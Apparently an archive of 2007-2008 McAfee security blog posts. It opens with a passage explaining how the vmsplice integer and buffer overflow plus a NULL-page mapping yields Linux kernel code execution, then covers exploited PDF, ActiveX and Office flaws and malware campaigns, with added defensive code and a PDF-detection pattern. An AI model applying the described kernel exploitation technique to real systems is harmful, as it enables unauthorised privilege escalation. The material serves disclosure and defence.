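To make the wrap concrete, here is a small C program, an added illustration rather than kernel code or the exploit, that repeats the npages computation with explicit 32-bit types and puts a checked version beside it. The constants PIPE_BUFFERS, PAGE_SIZE and PAGE_SHIFT use the values of a 32-bit x86 build; the checked variant rejects a len for which off + len + PAGE_SIZE - 1 would wrap, the same kind of bound an access_ok()-style range check enforces on base + len (that comparison is mine, the post does not describe the fix).

```c
/*
 * Added illustration (not kernel code and not the exploit): the npages
 * computation from get_iovec_page_array(), redone with explicit 32-bit types
 * so the wrap reproduces on any host, next to a checked version.
 * Constants use the values of a 32-bit x86 kernel build.
 */
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT   12
#define PAGE_SIZE    ((uint32_t)1 << PAGE_SHIFT)
#define PIPE_BUFFERS 16u

/* The computation as the vulnerable kernel did it: the sum can wrap to a
 * small value, so npages can come out as 0 and slip past the cap below. */
uint32_t npages_vulnerable(uint32_t base, uint32_t len, uint32_t buffers)
{
    uint32_t off = base & (PAGE_SIZE - 1);
    uint32_t npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
    if (npages > PIPE_BUFFERS - buffers)
        npages = PIPE_BUFFERS - buffers;
    return npages;
}

/* Checked version: reject the request before computing the page count when
 * off + len + PAGE_SIZE - 1 would wrap (the bound an access_ok()-style range
 * check enforces on base + len), when len is zero, or when no pipe buffers
 * are left.  Returns 0 and stores npages (always >= 1) on success, -1 otherwise. */
int npages_checked(uint32_t base, uint32_t len, uint32_t buffers, uint32_t *out)
{
    uint32_t off = base & (PAGE_SIZE - 1);

    if (len == 0 || buffers >= PIPE_BUFFERS)
        return -1;
    /* off + len + PAGE_SIZE - 1 must not exceed UINT32_MAX */
    if (len > UINT32_MAX - off - (PAGE_SIZE - 1))
        return -1;

    uint32_t npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
    if (npages > PIPE_BUFFERS - buffers)
        npages = PIPE_BUFFERS - buffers;
    *out = npages;
    return 0;
}

/* Convenience wrapper: the checked page count, or -1 if the request is rejected. */
int npages_checked_value(uint32_t base, uint32_t len, uint32_t buffers)
{
    uint32_t n;
    return npages_checked(base, len, buffers, &n) == 0 ? (int)n : -1;
}

int main(void)
{
    /* A sane request: 2 pages starting at a page boundary. */
    printf("len=0x2000      vulnerable=%u checked=%d\n",
           npages_vulnerable(0x1000u, 0x2000u, 0),
           npages_checked_value(0x1000u, 0x2000u, 0));
    /* The wrapping request from the analysis: len close to UINT32_MAX. */
    printf("len=0xFFFFFFFF  vulnerable=%u checked=%d\n",
           npages_vulnerable(0x1000u, 0xFFFFFFFFu, 0),
           npages_checked_value(0x1000u, 0xFFFFFFFFu, 0));
    return 0;
}
```

With len = 0xFFFFFFFF the vulnerable computation yields npages = 0, which passes the “npages > PIPE_BUFFERS - buffers” cap untouched and is exactly the value get_user_pages must never receive; the checked version refuses the request before that point.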

The reliable exploitation happens thanks to the subsequent loop:

1320:       for (i = 0; i < error; i++) {
1321:               const int plen = min_t(size_t, len, PAGE_SIZE - off);
1322:
1323:               partial[buffers].offset = off;
1324:               partial[buffers].len = plen;
1325:
1326:               off = 0;
1327:               len -= plen;
1328:               buffers++;
1329:       }

Here, the partial array, which is also PIPE_BUFFERS elements long, is overflowed with (off=0, plen=0x1000) pairs. Now, depending on the variable layout chosen by the compiler, various data structures that follow the partial array can be overwritten with zeros. In the most common case, the pages array is located right after the partial array. The pages array contains pointers, so after the preceding loop it will contain NULL pointers.

Normally, when the kernel tries to access a NULL pointer, the result is an exception and the process is terminated. However, the attacker can map memory pages at address zero and store arbitrary data there. In that scenario, when the kernel dereferences pointers from the pages array, attacker-controlled data is processed, which may result in arbitrary code execution in the kernel context. In our case, the convenient technique is to make an entry in the pages array look like a compound page descriptor, which results in a function call to an attacker-controlled address in user space:

37 static void put_compound_page(struct page *page) /* attacker controls arg */
38 {
39     page = (struct page *)page_private(page);
40     if (put_page_testzero(page)) {
41             void (*dtor)(struct page *page);
42
43             dtor = (void (*)(struct page *))page[1].lru.next;
44             (*dtor)(page); /* so attacker controls the target of the call */
45     }
46 }

To sum up, the exploitation involves:

  • integer overflow
  • buffer overflow
  • mapping the zero address to allow NULL dereference

Workarounds

A kernel upgrade is the preferred solution, but if that is not feasible, there are workarounds.

A simple kernel module that disables the sys_vmsplice system call has been posted [2].

The exploit we’ve discussed relies heavily on the ability to map memory at address zero. Starting with kernel 2.6.23, there is a mechanism to forbid such mappings via procfs. The command echo 65536 > /proc/sys/vm/mmap_min_addr sets the lowest possible mapping address to 64K. Note that:

  • SELinux must be enabled (in enforcing mode) for this command to take effect.
  • Although this setting certainly makes the current exploit fail, there is a nonzero probability that the vulnerability can be exploited without mapping the zero address. I know of no code capable of such exploitation; however, it cannot be ruled out.
  • This setting may prevent exploitation of future NULL pointer dereference vulnerabilities. Very few programs make legitimate use of mapping the zero address.

References

[1] Linux vmsplice Local Root Exploit, by qaaz
[2] Runtime disable of sys_vmsplice

Another Adobe PDF Exploit in the Wild

McAfee Avert Labs is tracking active in-the-wild exploitation of a recently patched vulnerability in Adobe Acrobat Reader. The exploit can be embedded in a PDF file and is driven through Adobe JavaScript.

The first evidence of such maliciously crafted PDF files was posted to an Italian message forum from an alert administrator who noted that three of his workstations had been infected. Successful exploitation leads to the embedded JavaScript being executed on the victim’s machine. The script attempts to download a Trojan from an IP address in the Netherlands.

This exploit works for both browser-based and email attack vectors and affects the following Adobe products:

  • Adobe Reader 8.1.1 and earlier versions
  • Adobe Acrobat Professional, 3D, and Standard 8.1.1 and earlier versions

Complete mitigation requires upgrading Acrobat and Adobe Reader 7.x and 8.x to Version 8.1.2.

Malware authors will find this technique of using exploit-laden PDF files in spear phishing attacks very profitable–especially since the Portable Document Format (PDF) is a de-facto standard for exchanging electronic documents online. PDF files have traditionally been unfiltered at the gateway and until recently were considered risk free–in contrast to the notorious history associated with Microsoft Office documents.

With the release of Windows Vista and Microsoft Office 2007, however, Microsoft has made it more difficult for attackers to use buffer overflow exploits. Thus we expect to see exploit writers target the lower-hanging fruit. Exploiting vulnerabilities in popular applications from Adobe, Apple, or RealPlayer is proving to be just as advantageous and profitable for the bad guys.

We strongly advise users running vulnerable versions of Adobe Reader and Acrobat to update them from the Adobe site. McAfee users are protected against these maliciously crafted PDF files with today’s 5227 DAT release, which detects them as Exploit-PDF.b.

Yet another Yahoo zero-day attack hits the Web

Zero-day vulnerabilities in Yahoo products are nothing novel and should be taken very seriously. Last year, we also saw a couple of ActiveX-based vulnerabilities in Yahoo Messenger that are still exploited and incorporated into various web-based attack kits. One of the most prolific is still the Yahoo Webcam ActiveX Controls buffer overflow vulnerability.

Yahoo Music Jukebox is free music-management software that lets you play music files, burn CDs, and tune into your favorite Web radio stations. Within a day of the new Yahoo Jukebox zero-day being publicly disclosed on February 2, a fully working exploit was developed and widely circulated in various forums.

The first vulnerability is a stack-based buffer overflow in the overly long “url” parameter passed to the AddButton and AddImage functions in the YMP DataGrid ActiveX control (datagrid.dll).

The second vulnerability is a buffer overflow with a long “bitmapUrl” parameter passed to the AddBitmap function in the YMGMediaGridAx ActiveX control (mediagridax.dll).

This issue has been observed with Mediagridax.dll version 2.2.2.056 and datagrid.dll version 2.2.2.056, which are distributed as part of the latest version of Yahoo Music Jukebox, 2.2.2.056, and a few older Yahoo Messenger versions.

A further temporary workaround for the problem would be to set the killbit for the offending ActiveX controls:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22FD7C0A-850C-4A53-9821-0B0915C96139}

It could be only a matter of time until we see customized versions of these exploits make their way into the wild to be employed by malware authors to infect machines. McAfee customers have been protected from this threat since the 5223 DATS–as JS/Exploit-YahooGrid.

Making News with Old Word(s): MS06-027 and MS07-014

This week, McAfee® Avert® Labs detected a bunch of uninteresting old OLE exploits. The fact that they are old and still actively used by malware authors, however, shows that they continue to be a potent threat to the many computer users who do not routinely patch their systems.

At least seven maliciously crafted Word documents, touting recent political news, are believed to have taken their content directly off the Internet:

  • African countries need to further consolidate macroeconomic stability.doc
  • Free Tibet Olympics Protest on Mount Everest.doc
  • Hong Kong Parade Supports 19 Million CCP Withdrawals.doc
  • DIRECTORY OF TIBET SUPPORT GROUPS IN INDIA.doc
  • 2007-07 DRAFT Tibetan MP London schedule.doc
  • CHINA’S OLYMPIC TORCH OUT OF TIBET 1.doc
  • Disapppeared in Tibet.doc

Each of these documents is designed to install further backdoor or downloader Trojans on systems running unpatched versions of Microsoft Word. Two known Word vulnerabilities are exploited, and should be patched as below:

Vendor Patch   Release Date
MS06-027       June 13, 2006
MS07-014       February 13, 2007

For McAfee customers, proactive detection is available. For more information about coverage for your setup, go here:

Once again, we offer the gentle reminder to install the latest security patches from the vendor.

Excel Zero Day Overdue?

Last night Microsoft released Security Advisory (947563) due to the discovery of a targeted zero-day attack. Microsoft states the following products are vulnerable:

  • Microsoft Office Excel 2003 Service Pack 2
  • Microsoft Office Excel Viewer 2003
  • Microsoft Office Excel 2002
  • Microsoft Office Excel 2000
  • Microsoft Excel 2004 for Mac

I took a look at previous Office zero-day vulnerabilities that were discovered through active exploitation since the beginning of 2005. As you can see below, there was a seven-month gap in the public disclosure of these vulnerabilities.

Although this bit of trivia is somewhat interesting, it’s difficult to draw meaning from it. It’s possible that the lull exists only in reporting, rather than in the active exploitation itself. Here’s a per-product breakdown of the source of the vulnerabilities:

The last Excel zero-day discovered through exploitation was reported more than 18 months ago.

The Russian Business Network is on tenterhooks

It’s no secret anymore: the criminal organizations behind a large part of Internet-related fraud are huge and well organized. In the last quarter of 2007, two studies about RBN (the Russian Business Network), one of the best-known criminal organizations so far, were published. Last year, I looked at them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the VeriSign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs at the Washington Post, and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, name and photos of suspects, detailed lists of machines and autonomous systems as well as many other details were revealed. Because of this, the group has deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the business has been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is on the move: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns achieved by new C&C botnet implementations, new web sites hosting malicious software (like MPack or WebAttacker) and secretly reached after the victims encounter a hidden iFrame during Internet surfing.

People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

One puzzle piece is known as AS40989. Although it was not the core of RBN activity, it is well known because it appears to carry the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations; it also demonstrates that many people, at McAfee and elsewhere, stay tuned into the dark side of the Internet to understand how the situation is constantly changing and to fight this threat at a worldwide level.

Benazir Bhutto Assassination: New Avenue for Spreading Malware

A few weeks back we blogged about malware-laced codecs embedded in various Blogspot domains. Today within hours after the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors have started capitalizing on this news to spread a new fake codec. This time it is purported to be an assassination video of the former PM.

Claiming to offer a new HD codec, these malware authors attempt to social-engineer users into believing they are downloading a legitimate codec for playing the video. At least 10 Blogger websites were observed hosting this fake video (at the time of writing), which redirects users to a typo-squatted domain containing the fake codec:

http://video.googl.[removed]

Malicious code hosted on the 3322 domain is not something novel. One of the recent high profile attacks which pointed to a malicious script from the 3322 domain was the Indiatimes Mail hack.

There are a plethora of websites which attempt drive-by installations when unsuspecting users visit websites returning search engine results for “Benazir Bhutto”. Many of these compromised webpages have malicious scripts injected into the webpage which points to the 3322 domain. These webpages contain obfuscated variants of the MS06-014 exploit which is perhaps one of the most popular of all the exploits we see on a daily basis.

This fake Trojan codec is detected by the current DATs as Puper. The downloaded exploit is detected as VBS/Psyme and the executable is detected as Generic Downloader.c.

(Credits to Pradeep Govindaraju for the great malware analysis)

On the path to cross platform exploits

Occasionally we find PC malware that can have an effect on mobile phones or vice versa. The W32/Mobler worm installs SymbOS/MultiDropper.CC to any Windows system it infects. The Symbian malware has no effect on the PC. Similarly SymbOS/Multidropper.CC installs W32/Mobler to the memory card. The mobile version is arguably more effective as inserting a memory card with Mobler into a PC with AutoRun configured is enough to cause an infection.

The malware author was trying to save some effort in the creation of new malware by reusing older malware. This is not the usual case with malware as creators, driven by the need to avoid detection, produce their own code or use newer malware toolkits.

Multi platform exploits
The situation with vulnerability exploits is more complex. While exploits are usually tied very closely to hardware and operating systems, they are also occasionally distributed as source code, allowing study and modification. An example of this is the libTIFF exploit used by hackers to install homebrew games on the Sony PlayStation Portable (PSP). The PSP libTIFF exploit was subsequently ported to the iPhone and allowed the installation of third-party applications. Security researchers later added the libTIFF exploit to a penetration testing framework.

Portable malware knowledge
Penetration testing frameworks help to tie exploits to payloads (e.g. gaining control of a vulnerable system). The frameworks allow the reuse of previous vulnerability research. This reduces the work needed by a penetration tester or attacker to fully utilize an exploit: they can write multiple payloads for a single vulnerability exploit.

In a series of blog postings, a security researcher detailed the process he used to port the libTIFF exploit and develop multiple payloads for the iPhone. It helped a bit that the iPhone and Macs both run versions of OS X. Although they use different types of CPUs (x86 for Mac; ARM for iPhone), he was able to leverage his Mac payload knowledge to produce iPhone payloads in a few weeks’ time.

Mobile exploits
This week we saw the release of a number of exploits for a buffer overflow vulnerability in various PC multimedia players. The vulnerability was limited to a specific MP4 video file codec. The exploits, which we detect as Exploit-MP4, were implemented as specially crafted MP4 video files.

There was a possibility that the malformed video files could cause issues on mobile phones. During testing we found that one of the exploits caused certain phones to hang when played. When we investigated further, we discovered that a similar buffer overflow to the PC existed on the phones. While the exploit will only cause a denial of service currently, it is possible that an attacker could develop a more malicious payload for the affected phones. The example of the penetration testing framework shows that it is relatively straightforward for dedicated attackers to use previously gained knowledge to produce mobile exploits in short periods of time.

Rootkits in China Part 1

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or by viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown (zero-day) vulnerabilities are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits onto user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, the Baofeng ActiveX vulnerability, the RealPlayer ActiveX vulnerability and so on.

In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it sends messages containing links to malicious websites to all of the affected user’s friends. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against.

Another technique used to spread rootkits is the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..

References:

Rootkit Paper 1
Rootkit Paper 2

Web Site of the French Embassy in Libya Under Attack

For a long time, we spoke regularly about IFRAME injection. This year, many pages belonging to legitimate sites were secretly modified. Many will remember the Italian Job and the thousands of infected sites in the realm of tourism, the car industry, movies and music.

The people behind these attacks love to use highly topical issues in order to attract as many people as possible. This week in my country, the visit by Libyan President Muammar Khadafi is stirring controversy. It has made many headlines in France. No doubt this is why the French Embassy Web Site is now infected by malicious code. Please do not attempt to reach the site, it is still dangerous.

The first iframe routes the victim to sites hosted by a Hong Kong provider. Two further links then redirect the visitor.

From Hong Kong, we move to Russia and Ukraine where exploit and downloaders are used (Exploit-YIMCAM and downloader-AUD).

Once again, we can see how the people involved in such attacks use dedicated malicious web sites in various countries to make them difficult to defeat. It is especially difficult when an ISP agrees to host web sites without verifying the scant data the criminals enter when they register. The following example, which I found when I looked at this attack, fully demonstrates this:

Be careful of Real Media files downloaded from the Internet

Recently, I had some friends complain about problems with Real Media files (*.rm/*.rmvb). According to them, after downloading and playing rmvb files, the Real Media Player launched a malicious webpage without prompting. Later, they noticed their OS running noticeably slower. And later still, they found their IM account passwords modified and online gaming accounts stolen.

It appears that the media files they downloaded were created by a hacker and designed to open malicious webpages. I investigated this and found it is quite easy to add a malicious webpage to rmvb files. The hacker used freely available software. These programs include applications that can be used to add events to rmvb files. A time and URL are specified in a text file, then imported into the rmvb file using these programs, and that’s it! When the rmvb file is opened in RealPlayer, the URL will automatically be opened after the specified time has elapsed. My advice was to scan any downloaded media files with antivirus software before playing them. Another option is to use a player other than RealPlayer.

Hope you can enjoy Real Media without the malicious webpages!!!

MS Access Exploit in the Wild

You may have seen a number of news reports in the past day or two on the active exploitation of a Microsoft Access vulnerability. Here is one story by PC World.

The US-CERT’s current activity Web page, “a regularly updated summary of the most frequent, high-impact types of security incidents currently being reported to the US-CERT,” warned about this active exploitation on December 10.

It is rumored that the vulnerability being exploited is CVE-2007-6026.

Avert Labs is working to find out more. As they say in the press, watch this space!

While we wait, here’s what we know about CVE-2007-6026. It’s a stack overflow in Access. A user would have to open a specially crafted Access database for an attack to take place. Although user assistance is required for exploitation, an exploit could be delivered over various attack vectors, including the Web, e-mail, and IM. Attacks could be coupled with well-established social engineering techniques. And now for the rub: this vulnerability is currently unpatched.

Avert Labs’ 2008 Threat Predictions

It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

Day in the life of a researcher

Most of the virus researchers in Avert spend their days analyzing samples coming in from customers. With a good percentage of the samples coming in every day being unknown, there’s plenty to keep us busy, 24/7/365. But what is it like, sorting through an unending stream of samples every day? What does that entail?

It’s a bit like trying to identify a life-form from a disconnected body part. Sometimes the body part is actually the whole animal, but it’s often just a toenail or a feather. There are times where we don’t even get a body part, but a footprint or a piece of the animal’s droppings.

Sometimes we’ll get lucky and it’s an animal whose footprint we know really well, or which has very distinctive feathers. Then we can say “there’s a good chance what you have is a peacock”, based on just that feather. But more often than not, people are dealing with something entirely new or rare. Perhaps this critter only displays its distinctive traits in very specific circumstances.

Of course, our favorite sort of sample is one which is a complete body with a good explanation of where and how the animal was found. Whereas a foot accompanied by no information may get an answer of “This is an amphibian”, more of the animal or more context can increase the odds of us being able to say something more specific: “This is Litoria caerulea - aka the Dumpy Tree Frog. It lives in Australia and it is often found hiding in downspouts.”

So how does someone wishing to submit something for analysis go about doing it?

For starters, include as much info as you can: What version of security product are you using? In the case of our products, what version of the product, what engine and DAT files are you using? Are you seeing detection with some AV product? What filename and virus name was given? Are you seeing strange behavior that you associate with the file?

Getting the whole beast can be a bit more tricky. There’s sort of a continuum of sneakiness, from very spammy looking emails with attachments, to bots which get in through software vulnerabilities and then drop rootkits. If you’re the “lucky” recipient of the easy variety, ZIP up that email and send it to us.

If your sample falls somewhere on the sneakier side of the spectrum, files can really be scattered all over a machine, and some of them are particularly good at hiding. You may want to try scanning your system with the Rootkit Detective or the Beta DATs from the Avert Tools page. This can help identify more suspicious files.

Maybe you’re pretty astute and you’ve noticed that after you ran a strange file, it created hundreds of randomly named files in your Windows directory. We may or may not need more than one of those files. You’ll want to check for duplicates, to make sure. If you know how to generate hashes for a file, just make sure you have one of each unique hash, up to about 10. (If you have something parasitic or polymorphic this will give us a decent representation.) If you’re not sure how to create a hash, there are certain programs which can help you. One of my favorites is the CRC option in WinZIP (in Configurations, under the Options menu). This allows you to group by CRC and get rid of any duplicates.

In short, try not to just send a blurry video of Sasquatch (or is that a guy in a gorilla suit?) or to send us a hundred disembodied ant legs. The more thorough and complete the sample, the better the chances of getting a complete picture of what’s plaguing your machine.

PDF mailto Exploit: Seen in wild today!

McAfee Avert Labs today observed e-mail messages with malicious PDF attachments exploiting the critical Adobe Acrobat Mailto Unspecified PDF File Security Vulnerability (CVE-2007-5020) being spammed in the wild. Successful exploitation leads to a batch file being executed on the victim’s machine that disables the built-in Windows firewall and then downloads a password stealer from an IP address located on the RBN network.

Malware authors will find this technique of sending exploit-laden PDF files extremely profitable especially in targeted attacks since the Portable Document Format is the de-facto standard for exchanging electronic documents. PDF files have traditionally been unfiltered at the email gateway and until recently were considered risk free in stark contrast to the notorious history associated with Microsoft Office documents.
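Since the post notes that PDF files have traditionally passed the email gateway unfiltered, here is a small gateway-side check for the class of PDF it describes. This is an added example, not code from the original post or from McAfee: it walks the raw PDF bytes for URI actions (the “/URI (...)” entry of a URI action dictionary) and reports any that use the mailto: scheme, escalating when the address carries percent signs or shell metacharacters, which a legitimate mail link has no reason to contain. Only literal strings are handled; hex strings and compressed object streams would need the PDF decoded first. The PDF fragments and addresses are constructed placeholders.

```python
"""Flag PDF attachments that carry mailto: URI actions (added example)."""
import re

# "/URI (literal string)" with PDF escapes (\( \) \\) allowed inside the string.
URI_ACTION = re.compile(rb'/URI\s*\(((?:\\.|[^\\)])*)\)', re.DOTALL)

# Characters that have no business in a mailto: address but matter to a shell.
SUSPICIOUS_CHARS = re.compile(r'[%"&|<>]')

# Constructed fragments (not real documents): a normal web link, a plain
# mailto: link, and a mailto: link carrying odd characters.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Annot /Subtype /Link "
    b"/A << /S /URI /URI (http://www.example.com/page\\(1\\)) >> >> endobj\n"
    b"%%EOF\n"
)
PLAIN_MAILTO_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Action /S /URI /URI (mailto:helpdesk@example.com) >> endobj\n"
    b"%%EOF\n"
)
ODD_MAILTO_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Action /S /URI "
    b"/URI (mailto:user@example.com%PLACEHOLDER\"&placeholder) >> endobj\n"
    b"%%EOF\n"
)


def extract_uri_actions(pdf_bytes):
    """Return the decoded URI strings of all literal-string /URI entries."""
    uris = []
    for m in URI_ACTION.finditer(pdf_bytes):
        raw = m.group(1)
        # Undo PDF literal-string escapes for parentheses and backslashes.
        raw = raw.replace(b'\\(', b'(').replace(b'\\)', b')').replace(b'\\\\', b'\\')
        uris.append(raw.decode('latin-1'))
    return uris


def classify_pdf(pdf_bytes):
    """Return (verdict, findings); verdict is 'clean', 'suspicious' or 'block'.

    Any mailto: action is at least suspicious at a mail gateway; one that
    carries shell-relevant characters is blocked outright.
    """
    findings = []
    verdict = 'clean'
    for uri in extract_uri_actions(pdf_bytes):
        if not uri.lower().startswith('mailto:'):
            continue
        if SUSPICIOUS_CHARS.search(uri):
            findings.append(('block', uri))
            verdict = 'block'
        else:
            findings.append(('suspicious', uri))
            if verdict == 'clean':
                verdict = 'suspicious'
    return verdict, findings


if __name__ == '__main__':
    for name, doc in (('benign', BENIGN_PDF), ('plain mailto', PLAIN_MAILTO_PDF),
                      ('odd mailto', ODD_MAILTO_PDF)):
        print(name, classify_pdf(doc))
```

In a real gateway the bytes would come from the decoded attachment; objects inside compressed streams (FlateDecode) must be inflated before this scan sees them, otherwise the check is trivially bypassed.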

But with Microsoft making it difficult for attackers by raising the bar for buffer overflow exploits with the release of Windows Vista and Microsoft Office 2007, we expect to see exploit writers target the lower hanging fruit. Abusing flaws in popular applications such as Adobe, Apple, RealPlayer or antivirus products is proving to be just as advantageous and profitable for the bad guys. McAfee Avert Labs anticipates that spammers in collusion with malware authors will continue exploiting popular application flaws, and it is imperative that users are educated on how to avoid becoming a victim.

Users running vulnerable versions of Adobe Reader and Acrobat 8.1 or earlier are strongly advised to update them from the Adobe site. McAfee users are pro-actively protected against Exploit-PDF based threats with the latest DAT files.

RealPlayer ‘Zero Day FIX’ Hits the Web

Earlier today we posted a blog entry: RealPlayer Zero Day Exploit Hits the Web.  Well RealPlayer responded RealQuick.  In less than 24 hours they managed to ship a patch.  That’s what I call rapid response.  Real also states that more information will be posted on their Security Updates & Incident Reports page.

Earlier today McAfee’s Regional Virus Info identified over 250 unique machines reporting Exploit-RealPlay.a detections, 99% of which reside in the US.  This does not mean that each of these systems was vulnerable, but it does mean that in all likelihood thousands of systems worldwide were exposed to the malicious code.

RealPlayer Zero Day Exploit Hits the Web

Last night we obtained a sample of a RealPlayer zero day exploit.  RealPlayer 11 Beta, 10.5, and older versions are affected.  Today’s DAT release, version 5145, contains detection under the name Exploit-RealPlay.a.  At this point, exposure appears to be limited, but we can expect public exploit code to surface before too long.  At that point exploitation is likely to follow the path of many other drive-by exploits and become fairly well distributed.

The vulnerability lies in a RealPlayer ActiveX control, and can be mitigated by setting the appropriate kill bit via the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5} 
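The kill bit is bit 0x400 of the “Compatibility Flags” DWORD under that key; once it is set, Internet Explorer refuses to instantiate the control. A quick way to confirm the mitigation across machines is to export the key with reg export and audit the result. The script below is an added example, not from the original post or from McAfee; it parses such an export and reports whether the kill bit is set for the CLSIDs you care about. The export text it runs on is constructed, with the RealPlayer CLSID from the post and a second, made-up CLSID.

```python
"""Audit ActiveX kill bits from a Windows registry export (added example)."""
import re

KILL_BIT = 0x400  # Compatibility Flags bit that stops IE instantiating a control
ACTIVEX_COMPAT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

# CLSID named in the post for the vulnerable RealPlayer control.
REALPLAYER_CLSID = "{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}"
# Made-up CLSID used only to show a control whose kill bit is NOT set.
OTHER_CLSID = "{00000000-1111-2222-3333-444444444444}"

# Constructed sample of what `reg export` produces for the key above.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-1111-2222-3333-444444444444}]
"Compatibility Flags"=dword:00000001
"""


def parse_reg_export(text):
    """Return {key_path (lower-cased): {value_name: int}} for DWORD values.

    Registry key names are case-insensitive, so paths are normalised to
    lower case; value names keep their case.
    """
    keys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
            if m:
                keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def kill_bit_set(reg, clsid):
    """True if the kill bit is set for clsid in a parsed export."""
    key = (ACTIVEX_COMPAT + "\\" + clsid).lower()
    flags = reg.get(key, {}).get("Compatibility Flags", 0)
    return bool(flags & KILL_BIT)


def audit(export_text, clsids):
    """Map each CLSID to whether its kill bit is set in the export."""
    reg = parse_reg_export(export_text)
    return {c: kill_bit_set(reg, c) for c in clsids}


if __name__ == "__main__":
    for clsid, ok in audit(SAMPLE_EXPORT, [REALPLAYER_CLSID, OTHER_CLSID]).items():
        print(clsid, "kill bit set" if ok else "kill bit NOT set")
```

Real exports from reg export are UTF-16 with a byte-order mark, so read them with `open(path, encoding="utf-16")` before passing the text to `audit`. A CLSID that is absent from the export is reported as unprotected, which is the correct conservative answer.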

While we generally keep this blog research focused (and shy away from mentioning products), zero day exploit announcements seem half-done without some mention of information on how our products deal with the threat.

McAfee product coverage information will be sent out via a McAfee Avert Labs Security Advisory service shortly.  This includes coverage information for the following product lines.

  • All McAfee virus scanning technologies that utilize the DAT files, including:
    • GroupShield
    • LinuxShield
    • PortaShield
    • Secure Internet Gateway
    • Secure Messaging Gateway
    • Secure Web Gateway 
    • Total Protection (TOPS)
    • VirusScan Enterprise
    • VirusScan Online
  • VirusScan Enterprise Buffer Overflow Protection
  • Host IPS
  • IntruShield
  • Foundstone
  • McAfee Network Access Control (MNAC)
  • McAfee Policy Auditor and McAfee Remediation Manager compliance

Nuwar starts ‘Krackin’

The latest trick Nuwar (aka Storm) plays looks like this:

Screenshot of Webserver

